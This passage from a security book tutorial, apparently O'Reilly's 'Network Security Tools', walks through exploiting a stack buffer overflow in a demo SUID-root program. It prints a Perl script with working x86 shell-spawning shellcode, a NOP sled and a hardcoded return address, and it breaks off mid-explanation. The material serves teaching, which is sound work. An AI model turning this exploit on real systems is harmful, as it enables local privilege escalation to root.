Putting It All Together: Exploiting a Program
All the
elements of our exploit buffer are in
place: the filler, the new EIP the program will return to, the NOP
sled, and our shellcode. It’s time to try it out
from the command line outside the debugger. Here is a Perl script
that generates an exploit buffer using the previously discussed
values. Note that the pack( )
function handles the
little-endian conversion:
#!/usr/bin/perl # File: exploit_buffer.pl my $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80". "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b". "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd". "\x80\xe8\xdc\xff\xff\xff/bin/sh"; my $return = 0xbfff8f60; print "A"x28 . pack('V',$return) . "\x90"x1024 . $shellcode;
The chown
and chmod
commands
are used to set up our example program as a set user
ID (SUID) application. These commands
cause the program to be executed at the root user’s
privilege level. This is done to demonstrate the effect of an
exploited SUID root program in the wild.
$ su Password: # chown root:root ./vuln # chmod +s ./vuln # exit $ ls -la vuln -rwsrwsr-x 1 root root 5817 Jan 24 05:50 vuln
Now, for the actual exploitation of the program; use the
`
(backtick) character to execute the Perl script that generates our exploit buffer. This buffer becomes the first argument to our vulnerable program. As previously mentioned, the overflowed program overwrites the sEIP address to our new return value which should point into our NOP ...
Get Network Security Tools now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.